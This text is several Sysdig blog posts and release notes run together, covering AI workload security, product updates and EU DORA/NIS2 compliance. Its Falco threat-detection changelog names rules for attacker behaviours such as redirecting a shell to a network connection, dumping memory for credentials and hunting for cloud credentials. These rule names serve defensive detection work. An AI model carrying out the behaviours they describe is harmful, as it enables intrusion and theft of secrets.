Sysdig Training

Kraken Discovery Labs

Attacks no longer take days—they take minutes. Cloud security requires a modern detection and response benchmark. The 555 benchmark specifies that you have 5 seconds to detect, 5 minutes to triage, and 5 minutes to respond.

In this 60-minute workshop, you’ll execute actual cloud attacks like SCARLETEEL and then assume the role of the defender, leveraging threat-hunting strategies to detect and respond immediately in the cloud.

You can sign up for this lab on our website.

Instructor Led Training

We have a new Azure-specific Cloud Security Posture Management (CSPM) lab available for ILT (Instructor Led Training) delivery. This ILT content included the concepts of zones and Infrastructure as Code, integrated with source control using GitHub or GitLab.

If you are interested in learning more about how to schedule an ILT workshop, please contact your account team.

The post What’s New in Sysdig – May 2024 appeared first on Sysdig.

Today, we are thrilled to announce the launch of AI Workload Security to identify and manage active risk associated with AI environments. This new addition to our cloud-native application protection platform (CNAPP) will help security teams see and understand their AI environments, identify suspicious activity on workloads that contain AI packages, and prioritize and fix issues fast.

Skip ahead to the launch details!

AI has changed the game

The explosive growth of AI in the last year has reshaped the way many organizations build applications. AI has quickly become a mainstream topic across all industries and a focus for executives and boards. Advances in the technology have led to significant investment in AI, with more than two-thirds of organizations expected to increase their AI investment over the next three years across all industries. GenAI specifically has been a major catalyst of this trend, driving much of this interest. The Cloud Security Alliance’s recent State of AI and Security Survey Report found that 55% of organizations are planning to implement GenAI solutions this year. Sysdig’s research also found that since December 2023, the deployment of OpenAI packages has nearly tripled.

With more companies deploying GenAI workloads, Kubernetes has become the deployment platform of choice for AI. Large language models (LLMs) are a core component of many GenAI applications that can analyze and generate content by learning from large amounts of text data. Kubernetes has numerous characteristics that make it an ideal platform for LLMs, providing advantages in scalability, flexibility, portability, and more. LLMs require significant resources to run, and Kubernetes can automatically scale resources up and down, while also making it simple to export LLMs as container workloads across various environments. The flexibility when deploying GenAI workloads is unmatched, and top companies like OpenAI, Cohere, and others have adopted Kubernetes for their LLMs. 

From opportunity to risk: security implications of AI

AI continues to advance rapidly, but the widespread adoption of AI deployment creates a whole new set of security risks. The Cloud Security Alliance survey found that 31% of security professionals believe AI will be of equal benefit to security teams and malicious third parties, with another 25% believing it will be more beneficial to malicious parties. Sysdig’s research also found that 34% of all currently deployed GenAI workloads are publicly exposed, meaning they are accessible from the internet or another untrusted network without appropriate security measures in place. This increases the risk of security breaches and puts the sensitive data leveraged by GenAI models in danger.

Another development that highlights the importance of AI security in the cloud are the forthcoming guidelines and increasing pressures to audit and regulate AI, as proposed by the Biden administration’s October 2023 Executive Order and following recommendations from the National Telecommunications and Information Administration (NTIA) in March 2024. The European Parliament also adopted the AI Act in March 2024, introducing stringent requirements on risk management, transparency, and other issues. Ahead of this imminent AI legislation, organizations should assess their own ability to secure and monitor AI in their environments.

Many organizations lack experience securing AI workloads and identifying risks associated with AI environments. Just like the rest of an organization’s cloud environment, it is critical to prioritize active risks tied to AI workloads, such as vulnerabilities in in-use AI packages or malicious actors trying to modify AI requests and responses. Without full understanding and visibility of AI risk, it’s possible for AI to do more harm than good.

Mitigate active AI risk with AI Workload Security

We’re excited to unveil AI Workload Security in Sysdig’s CNAPP to help our customers adopt AI securely. AI Workload Security allows security teams to identify and prioritize workloads in their environment with leading AI engines and software packages, such as OpenAI and Tensorflow, and detect suspicious activity within these workloads. With these new capabilities, your organization can get real-time visibility of the top active AI risks, enabling your teams to address them immediately. Sysdig helps organizations manage and control their AI usage, whether it’s official or deployed without proper approval, so they can focus on accelerating innovation.

Sysdig’s AI Workload Security ties into our Cloud Attack Graph, the neural center of the Sysdig platform, integrating with our Risk Prioritization, Attack Path Analysis, and Inventory features to provide a single view of correlated risks and events.

AI Workload Security in action

The introduction of real-time AI Workload Security helps companies prioritize the most critical risks associated with AI environments. Sysdig’s Risks page provides a stack-ranked view of risks, evaluating which combinations of findings and context need to be addressed immediately across your cloud environment. Publicly exposed AI packages are highlighted along with other risk factors. In the example below, we see a critical risk with the following findings:

1. Publicly exposed workload
2. Contains an AI package
3. Has critical vulnerability with an exploit running on an in-use package
4. Contains a high confidence event

Based on the combination of findings, users can determine the severity of the risk that exposed AI workloads create. They can also gather more context around the risk, including which packages on the workload are running AI and whether vulnerabilities on these packages can be fixed with a patch.

Digging deeper into these risks, users can also get a more visual representation of the exploitable links across resources with Attack Path Analysis. Sysdig uncovers potential attack paths involving workloads with AI packages, showing how they fit with other risk factors like vulnerabilities, misconfigurations, and runtime detections on these workloads. Users can see which AI packages running on the workload are in use and how vulnerable packages can be fixed. With the power of AI Workload Security, users can quickly identify critical attack paths involving their AI models and data, and correlate with real-time events.

Sysdig also gives users the ability to identify all of the resources in your cloud environment that have AI packages running. AI Workload Security empowers Sysdig’s Inventory, enabling users to view a full list of resources containing AI packages with a single click, as well as identify risks on these resources.

Want to learn more?

Armed with these new capabilities, you’ll be well equipped to defend against active AI risk, helping your organization realize the full potential of AI’s benefits. These advancements provide an additional layer of security to our top-rated CNAPP solution, stretching our coverage further across the cloud. Click here to learn more about Sysdig’s leading CNAPP.

See Sysdig in action

Sign up for our Kraken Discovery Lab to execute real cloud attacks and then assume the role of the defender to detect, investigate, and respond.

The post Accelerating AI Adoption: AI Workload Security for CNAPP appeared first on Sysdig.

March doesn’t just signify the arrival of spring showers and blooming flowers, but also the arrival of Women’s History Month, a time to celebrate and honor the contributions and achievements by women in the United States.

International Women’s Day is also celebrated during March, a day which celebrates the achievements of women from all across the world.

Stay tuned for more updates from Sysdig, and let’s get started!

Sysdig Secure

View Cloud Host Vulnerabilities in Inventory

Inventory now lets you search for vulnerable resources on your AWS and GCP cloud hosts (EC2 Instance, Compute Instance).

Furthermore, each cloud host’s resource-360 drawer includes vulnerability findings through a new tab.
You can also search on Package Name-Version. Note that Azure VM Hosts are out of scope at this time. See Inventory for details.

Inventory UI Updates

You can now search by Host Image ID for AWS EC2 Instance and GCP Compute Instance.

Monitor Objects in S3 Buckets

Agentless AWS Cloud Threat Detection (CDR) coverage is extended to monitor operations performed on objects stored in Simple Storage Service (S3) buckets through S3 notifications.

AWS CloudTrail integration now supports:

• ReadOnly management events (whose verb starts with Get/List/Describe).
• Coverage for S3 notifications to monitor S3 buckets and extend our AWS Agentless CDR coverage.

For details, see the AWS Agentless instructions to connect a cloud account.

Risks Module Released in Technical Preview

We are excited to release Risks in Technical Preview. The Risks feature correlates findings from CSPM, KSPM, cloud log ingestion, CIEM, Vulnerability Management, and Agent-Based Threat Detection. By combining the most critical security issues, we prioritize the biggest risks for security teams to focus on.

For details, see Risks.

Kill Process in Workload

In Threat Detection Policies, Workload and List Matching policies can now be configured to kill the event-triggering process. For details, see Workload.

Improved Azure Cloud Account onboarding

Sysdig has launched an improved onboarding experience for Azure Cloud Accounts. Users can specify their installation preferences regarding desired features. Sysdig then guides them through the installation process step-by-step, ensuring a seamless and personalized experience.

In addition, Sysdig’s Agentless CDR now supports threat detection on Azure. By leveraging Falco and its constantly updated rules managed by the Sysdig Threat Research Team, as well as custom rules tailored to specific environments and security requirements, users can connect their Azure accounts effortlessly while benefiting from robust event processing.

For details, see Connect Cloud Account | Azure.

Global Service Accounts

Sysdig has extended the functionality of team-based service accounts with global service accounts. Unlike team-based service accounts, global service accounts can perform actions that require system level permissions. Admins can create a global service account through the API. See Global Service Accounts

CISA KEV

You can now check if a vulnerability, reported by pipeline, registry, or runtime scanning, is registered in the CISA KEV catalog and filter images by CISA KEV. This allows you to view details such as the date added and due date for CISA KEV vulnerabilities. Drill down into scan results to view the CISA KEV information associated with an image. For more information, see Key Vulnerability Management Terminology.

Platform-Based Scanning

Sysdig has extended the Vulnerability Management scanning capabilities to conduct platform scanning by default. The scanning tools analyze images and host filesystems to extract the Software Bill of Materials (SBOM) and send them to the Sysdig backend for evaluation. Vulnerability matching and policy evaluation now occur within the Sysdig platform rather than on the client side.

Platform-based scanning aims to optimize computing resources, conserve data transfer, improve response time by eliminating client-side evaluation of images, and enhance the robust tracking of images across the user environment. For more information, see Platform-Based Scanning.

Improved GCP Cloud Account Onboarding

Sysdig has launched an improved onboarding experience for GCP Cloud Accounts. Users can specify their installation preferences regarding desired features. Sysdig then guides them through the installation process step-by-step, ensuring a seamless and personalized experience.

In addition, Sysdig’s Agentless CDR now supports threat detection on GCP. By leveraging Falco and its constantly updated rules managed by the Sysdig Threat Research Team, as well as custom rules tailored to specific environments and security requirements, users can connect their GCP accounts effortlessly while benefiting from robust event processing.

For details, see Connect Cloud Accounts | GCP.

Sysdig Monitor

Global Service Accounts

Sysdig has extended the functionality of team-based service accounts with global service accounts. Unlike team-based service accounts, global service accounts can perform actions that require system-level permissions. Admins can create a global service account through the API. See Global Service Accounts

Deactivate User Option

Sysdig has added the ability to configure a period of inactivity for a user, after which the user is deactivated. This helps large enterprises manage users automatically rather than manually deleting users from Sysdig.

This feature is deactivated by default. Currently, it can be enabled via API only.

For details, access the API documentation under User-Deactivation.

Sysdig Agents

13.0.2 March 20, 2024

This hotfix addresses the following:

• Vulnerability fixes:
  • CVE-2024-24786
  • CVE-2024-27304
• The issue in the legacy_ebpf driver that impacted the RHEL kernel v5.14 with the RHEL subversion 4.10 or higher has been fixed.
• Kernel module build failure on linux kernel 6.8 has been fixed.

13.0.1 March 11, 2024

This hotfix fixed an issue where the Sysdig Agent could retain allocated UDP ports until reaching port saturation, occurring under specific combinations of the driver used and enabled features.

13.0.0 March 06, 2024

We strongly recommend you to skip v13.0.0 and upgrade to Sysdig Agent v13.0.1. See Breaking Changes for more information.

Feature enhancements

Updated Docker Image to UBI9

Sysdig Agent’s Universal Base Image has been upgraded from UBI8 to UBI9.

Added Agent health metrics in secure_light Mode

Added the following health metrics when the agent is running in secure_light mode:

• sysdig_agent_analyzer_num_evts
• sysdig_agent_analyzer_dropped_evts

Support for TLS and basic authentication in Agent Prometheus Exporter

Agent Prometheus Exporter now supports TLS and basic authentications.

Ability to collect subattributes from JMX metrics

Added the ability to collect individual subattributes from CompositeData JMX metrics.

Availability of promscrape in ARM64 in FIPS Mode

Sysdig Agent now includes FIPS-mode promscrape binary previously missing for ARM platforms.

Kill process in Workload

In Threat Detection Policies, Workload and List Matching policies can now be configured to kill the event-triggering process. For details, see Workload.

Breaking changes

As part of Sysdig Agent 13.0.0 release, and as anticipated in the release notes for the 12.20.0, Sysdig dropped the support for:

• logwatcher
• RHEL6 and CentOS6

All Sysdig users affected by these changes have been notified. If you haven’t received any communication from Sysdig, it means there is no impact on your usage.

Defect fixes

Updated ssl_shim configuration

The ssl_shim configuration has been changed to fix an issue where openssl.cnf bundled with the agent expected ssl_shim to select the FIPS or non-FIPS providers at startup time. This configuration broke other programs that are dynamically linked against OpenSSL v3.

Added a openssl_conf configuration flag to allow users to specify a custom openssl.cnf file for use with the agent. To include a custom OpenSSL v3 library, you need to set the custom openssl_conf and your library path. This configuration is required when openssl_lib points the agent to a custom OpenSSL v3.x library. See openssl_lib for more information.

Support for universal eBPF on 1-vcore machines

Universal eBPF is now supported on 1-vcore machines.

Scoping events to containers on specific Kubernetes clusters

The host scope resolution now works correctly when additional scope predicates are specified along with the standard contauner_id="". For example, contauner_id="" and kubernetes.cluster.name=my_cluster.

Fixed misleading collector reconnection attempts logs

Fixed an issue where agents report a large number of logs with “No further retries left for attachment to container.

Sysdig Cluster Shield Release Notes

Here are the most recent release notes for Sysdig Cluster Shield. Review the entries to learn about the latest features, defect fixes, and known issues.

0.7.0 March 18, 2024

Enhancements

• Added new Kubernetes Metadata Collector (Technical Preview).
• Added the ability to run in single process mode.
• Updated configuration for the Container Vulnerability Management feature.
• Enabled Platform Services by default. Added the ability to disable it through an additional helm chart value containing the current on premise version.
• Removed configuration for Offline Analyzer.
• Refactored the configuration for the registry certificate verification.

Defect fixes

Fixed a memory leak issue in the supervisor process.

0.1.0 March 07, 2024

Sysdig Cluster Shield released as controlled availability

Sysdig is delighted to announce the controlled availability of Sysdig Cluster Shield. This solution consolidates multiple agent deployments into a single containerized component, marking a significant advancement in simplifying the deployment, management, and configuration of the Sysdig suite of security and compliance tools at the cluster level. By streamlining operations for Kubernetes environments, Cluster Shield makes it easier than ever to maintain your security and compliance posture.

For more information, see Sysdig Cluster Shield.

Window Agent

Container enrichment

The agent is now capable of gaining visibility into containerized processes, allowing the containerd-based containers to be secured along with the host operating system.

Availability of Docker image for Windows Server v2019 and v2022

The Windows Agent is now available as a Docker image for Windows Server 2019 and Server 2022.

Defect fixes

Vulnerability fixes

• CVE-2023-45853
• CVE-2024-0727
• CVE-2023-5678
• CVE-2023-6237

Ability to handle wide characters from AmsiScanBuffer events

AMSI events carry the buffer parameter that contains the executed payload, such as Powershell cmdlet and loaded .NET assembly. This conveys that the parameter structure is dynamic and will greatly depend on the data source emitting the AMSI telemetry. As a consequence, the event parsing mechanism has been adapted to treat the parameters as dynamic, and thus derive the content of the AMSI buffer as dictated by the application type emitting the event.

SDK, CLI, and Tools

Sysdig CLI

Sysdig CLI Scanner v1.8.6 is out!

• Fixed CVE-2024-26147.
• Now, Sysdig CLI scanner will honor proxy env vars when pulling images! 

Sysdig CLI Scanner v1.9.0 is out.

IAC

• Fixed panic occurring during terraform directories scanning.
• Fixed bug on severity threshold flag.
• Exit code 1 is returned when violations exceed the threshold.
• Use v2 endpoint to get data from transforms.

VM

• Fixed a bug in maven matcher.
• Make policies succeed if, for a vulnerability, the fix version is present while the solution date is not.

Fixed Vulns

• CVE-2024-24786

https://sysdiglabs.github.io/sysdig-platform-cli

Python SDK

The latest version is v0.17.1. See the Sysdig Python SDK GitHub for details.

Terraform Provider

v1.22.0 is the latest version of  the Sysdig Terraform Provider. For more information, see our Terraform Provider docs.

Terraform Modules

• AWS Sysdig Secure for Cloud remains unchanged at  v0.10.9.
• Terraform Google secure v0.1.10
  • feat: Add module outputs for webhook-datasource #17
  • feat: agentless workload controller WIF #20
  • feat: Adding support for WIF based auth to Webhook Datasource module #21
  • feat(vm,cloud-scan): enables organizational use-case #23
  • test: Add validation test coverage #16
  • test(vm, cloud-scan): single-project use-case #18
  • ci: Update CODEOWNERS #19
  • ci: Update CODEOWNERS for workload scanning module#22
• Terraform Azure remains unchanged at v0.2.10.

Falco VSCode Extension

v0.1.0 is still the latest release. 

Sysdig Cloud Connector

The Cloud Connector remains v0.16.61.

Admission Controller

 Admission Controller remains (3.9.37) and helm chart (0.15.0). 

Sysdig Secure Inline Scan Action

The latest release remains unchanged at v3.5.0.

https://github.com/marketplace/actions/sysdig-secure-inline-scan

Sysdig Secure Jenkins Plugin

The Sysdig Secure Jenkins Plugin remains at version v2.3.0.

https://plugins.jenkins.io/sysdig-secure

Prometheus Integrations

We have released v1.28.0: https://github.com/draios/prometheus-integrations/releases/tag/v1.28.0

• ADD more scope to the quotas panels
• ADD change for no data description for Keda panel
• ADD rabbitMQ rule drop also by port
• FIX typo in some dashboard descriptions
• ADD Alert for Sysdig Monitor
• Full Changelog: v1.27.0…v1.28.0

Sysdig On-premise

6.9.1 Hotfix Release, March 2024

This hotfix addresses the following:

• Update the rules validator for the policies backend service to allow users to upgrade their default rules to the latest available ruleset.
• The error during the upgrade process, caused by a missing import code for pvStorageSize.cassandra, has been fixed.
• The issue where the installer incorrectly added a \n (line feed) to the context when current-context is used but the context is not specified in the values.yaml, or on the installer command line, has been resolved.
• Cassandra failure during the Zookeeper upgrade process in the installer when override fields are used. To fix the issue, remove the customOverride field:

cassandra:

  jvmOptions: -Xms6G -Xmx8G

   # customOverrides: |

   #   compaction_throughput_mb_per_sec: 300

Upgrade Process

Supported upgrades from: 5.0.x, 5.1.x, 6.x

For the full supportability matrix, see the On-Premises Install Documentation. This repository also includes the on-premises Installation documentation.

6.7.1 Hotfix Release, March 2024

This hotfix addresses an issue encountered during the zookeeper upgrade process in the installer, providing improved upgrade efficiency and speed.

Upgrade Process

Supported upgrades from: 5.0.x, 5.1.x, 6.x

For the full supportability matrix, see the On-Premises Install Documentation. This repository also includes the on-premises Installation documentation.

6.4.5 Hotfix Release, March 2024

This hotfix fixes an issue with the slowness in the Secure UI.

Upgrade Process

Supported upgrades from: 5.0.x, 5.1.x, 6.x

For the full supportability matrix, see the On-Premises Install Documentation. This repository also includes the on-premises Installation documentation.

Falco Threat Detection Rules Changelog

Several versions of the rules have been released in the last months. Below are the release notes for the most recent rules changes.

https://docs.sysdig.com/en/docs/release-notes/falco-rules-changelog

Rule Changes

• Added the following rules:
  • Connection to SMB Server detected
  • Steganography Tool Detected
  • Python HTTP Server Started
  • Execute Process from Masquerade Directory
  • Shared Libraries Reconnaissance Activity Detected
  • EC2 Instance Create User
  • Terminate EC2 Instances
  • Find Authentication Certificates
  • Contact GCP Instance Metadata Service from Host
  • Contact Azure Instance Metadata Service from Host
  • Execution from Temporary Filesystem
• Reduced false positives for the following rules:
  • Write below etc
  • Connection to IPFS Network Detected
  • nsenter Container Escape
  • Execution from Temporary Filesystem
  • Launch Root User Container 
  • Linux Kernel Module Injection Detected
  • Packet socket created in container
  • Container escape via discretionary access control
  • Suspicious Access To Kerberos Secrets
  • Redirect STDOUT/STDIN to Network Connection in Host
  • Suspicious Access To Kerberos Secrets
  • Dump memory for credentials
  • Mount on Container Path Detected
  • Create Symlink Over Sensitive Files
  • Possible Backdoor using BPF
  • eBPF Program Loaded into Kernel
  • Launch Suspicious Network Tool in Container
  • Suspicious Cron Modification
  • Execution from /tmp
  • Launch Sensitive Mount Container
  • Non sudo setuid
  • Suspicious Domain Contacted
  • Launch Suspicious Network Tool in Container
  • Modify Grub Configuration Files
  • Fileless Malware Detected
  • Container escape via discretionary access control
  • Mount on Container Path Detected
  • Find GCP credentials
  • Ransomware Filenames Detected
  • Mount Launched in Privileged Container
  • Modification of pam.d detected
  • Kernel startup modules changed
  • Suspicious RC Script Modification
  • Find Authentication Certificates
  • Redirect STDOUT/STDIN to Network Connection in Container
  • Suspicious Cron Modification
  • eBPF Program Loaded into Kernel
  • Non sudo setuid
  • Suspicious Operations with Firewalls
  • Suspicious RC Script Modification
  • Mount on Container Path Detected
  • Kernel Module Loaded by Unexpected Program
  • Packet socket created in container
  • Dump memory for credentials
  • Mount on Container Path Detected
• Improved output for Discovery Security Service Activity Detected rule.
• Improved output for Reconnaissance attempt to find SUID binaries and Dump memory for credentials rules.
• Reduced false positives for the Linux Kernel Module Injection Detected rule.
• Improved output for AWS rules – Event Summary.
• Added Execute Process from Masqueraded Directory to managed policies.
• Improved output for the Kernel startup modules changed rule.
• Removed the Execute Process from Masqueraded Directory rule from managed policies.
• Improved condition for the following rules:
  • Dump memory for credentials
  • Suspicious Access To Kerberos Secrets
  • Linux Kernel Module Injection Detected
  • Redirect STDOUT/STDIN to Network Connection in Host
  • Suspicious Cron Modification
  • Clear Log Activities
  • Modification of pam.d detected
  • Linux Kernel Module Injection Detected
  • Suspicious Cron Modification
  • Suspicious network tool downloaded and launched in container
  • Launch Suspicious Network Tool on Host
  • Find GCP Credentials
  • Launch Suspicious Network Tool in Container
• Improved description and tags for Change memory swap options rule.
• Improved tags for AWS EC2 ruleset.
• Improved condition for Suspicious Cron Modification rule.
• Improved output for AWS rules – Event Summary.
• Updated Indicators of Compromise rulesets with new findings.
• Improved tags for Suspicious Domain Contacted rule.
• Improved condition for macro network_tool_procs.
• Updated Indicators of Compromise rulesets with new findings.
• Improved condition for the Kernel Module Loaded by Unexpected Program rule.
• Improved tags for Suspicious Domain Contacted rule.
• Improved output for AWS rules – Event Summary.
• Added the Data Split Activity Detected and Contact EC2 Instance Metadata Service From Host rules.
• Improved condition for the Describe Instances rule.
• Improved tags for the GCP Create Cloud Function rule.
• Improved condition for the Kernel Module Loaded by Unexpected Program rule.
• Improved output for the Kernel Module Loaded by Unexpected Program rule.
• Improve output for AWS rules – Event Summary.
• Improve MITRE tags for AWS S3 ruleset.
• Improve condition for the Update Package Repository rule.

Default Policy Changes

Removed 

• Execute Process from Masqueraded Directory rule from managed policies.

Added the following rules:

• Python HTTP Server Started
• Execute Process from Masquerated Directory
• Shared Libraries Reconnaissance Activity Detected
• EC2 Instance Create User
• Terminate EC2 Instances
• Data Split Activity Detected
• Contact EC2 Instance Metadata Service From Host
  • Find Authentication Certificates
  • Contact GCP Instance Metadata Service from Host
  • Contact Azure Instance Metadata Service from Host
  • Execution from Temporary Filesystem
  • Connection to SMB Server detected
  • Steganography Tool Detected

Updated policies for the following rules:

• Mount on Container Path Detected
• Modify Grub Configuration Files rule
• Escape to host via command injection in process
• Discovery Security Service Activity Detected
• Java Process Class File Download rule.

Open Source

Falco

Falco 0.37.1 is the latest stable release.

New Website Resources

Blogs 

Webinars

A practical guide to resource constraints in Kubernetes

SOAR into 2024: Harness the power of your cloud detection and response

Spring Cyber Solutions Fest

https://go.sysdig.com/Deminar-Fortify-Google-Cloud-Security.html

The post What’s New – March 2024 appeared first on Sysdig.

Overview of DORA and NIS2

In the past, most regulations were checked periodically for compliance – maybe monthly, quarterly, or up to annually. However, to address the ongoing surge of cyberattacks and the speed at which they move, these new regulations are looking to implement stricter controls and, more importantly, very aggressive requirements around time to disclosure to regulatory authorities in the case of a security event, privacy event, or breach. In the case of DORA, you only have four hours from the moment of classification of the incident as major to disclose. With NIS2, you have 24 hours.

Digital Operational Resilience Act (DORA) is an implementing act introduced by the European Union to address and enhance the security and resilience of digital operations within the financial sector. It aims to consolidate and standardize the digital operational resilience practices across financial entities, ensuring that they can withstand, respond to, and recover from all types of ICT (Information and Communication Technology) related disruptions and threats. The Regulation will apply from Jan. 17, 2025, which means financial companies have less than a year to become compliant with DORA.

DORA applies to the vast majority of the financial services sector. This includes, but is not limited to:

• Banks and credit institutions
• Investment firms
• Insurance companies
• Asset managers
• Payment service providers
• Crypto-asset service providers

Additionally, DORA extends its reach to third-party ICT service providers, including cloud services, which are integral to the operations of financial entities. This is significant as it marks the first time financial services supervisors are given authority to oversee these third-party vendors directly. As it pertains to cloud, DORA also specifies that financial entities should use multi-cloud approaches to improve resiliency. Multi-cloud strategies can indirectly create other security gaps due to varied technology. This approach necessitates that appropriate unified controls and monitoring are implemented to ensure those security gaps aren’t exploitable.

Network and Information Systems Directive (NIS2) 

Unlike regulations, which are directly applicable, NIS2 is an EU directive that sets general objectives for Member States’ national laws on cybersecurity and ICT systems and networks, with the aim of strengthening security across the EU. 

The main goal of NIS2 is to significantly raise the level of cybersecurity across the EU by expanding the scope of the original directive, introducing stricter security requirements, and increasing the accountability of entities within critical sectors. 

NIS2 broadens the scope of cybersecurity obligations to include a wide range of sectors critical to the EU’s economy and society. It encompasses entities in energy, transport, banking, financial markets, healthcare, water supply, digital infrastructure, public administration, and space.

POINT OF VIEW PAPER
Practical Cloud Security Guidance in the Era of Cybersecurity Regulation

Read Now

Sysdig’s Role in Facilitating NIS2 and DORA Compliance

Sysdig is the first Cloud-Native Application Protection Platform (CNAPP) to provide out-of-box compliance policies specifically designed to help organization’s satisfy the technical elements of the European Union’s new regulatory frameworks, DORA and NIS2, as they pertain to cloud resources.

Reading the specifications of DORA and NIS2 could be complex – a best practice would be to disassemble this complex stuff in the elementary building blocks. And that’s what we’re going to do in the following section.

DORA 

Sysdig facilitates this by providing comprehensive controls covering various aspects of Linux, Kubernetes, cloud environments, and identity management. 

These are some of the technical requirements that apply to cloud environments. We will explain these requirements and look at some examples of security controls from Sysdig that ensure cloud assets meet DORA compliance conditions. 

These are just some examples of the technical requirements of DORA. Our comprehensive policy extends beyond these examples.

NIS2

NIS2 requirements are very similar to DORA but with a different scope. NIS2 covers all critical infrastructure companies. The scope of critical infrastructure is massive, including the expected healthcare providers, utilities, and telecom providers, but also digital service providers. Entities fall within essential or important categories with different control requirements, monitoring provisions, and attestation levels. 

Sysdig covers the 14 technical requirements of NIS2, with 2,905 total number of controls. 

Most of the technical requirements are under Article 21, “Cybersecurity risk-management measures,” of Chapter IV, “Cybersecurity Risk-Management measures and reporting obligations.” Here are some of the technical requirements.  

These are just some examples of the technical requirements of NIS2. Our comprehensive policy extends beyond these examples.

Conclusion

In conclusion, the NIS2 directive and DORA regulations mark significant milestones in the European Union’s journey towards stronger cybersecurity and operational resilience, particularly within critical sectors and the financial industry. Set to come into effect in January 2025, these comprehensive frameworks necessitate that affected entities — spanning a broad array of sectors — implement robust measures to protect their network and information systems against a wide range of cyber threats.

In this pivotal moment, Sysdig stands out as the first Cloud-Native Application Protection Platform (CNAPP) to offer out-of-the-box policies to assist in NIS2 and DORA compliance. This unparalleled readiness positions Sysdig not just as a tool, but as a strategic partner for businesses seeking to navigate the impending regulatory landscape confidently.

To learn more about compliance and regulations in cloud-native environments, watch our panel conversation: Delivering Secure, Compliant Financial Services in the Cloud.

The post The First CNAPP with Out-of-the-Box NIS2 and DORA Compliance appeared first on Sysdig.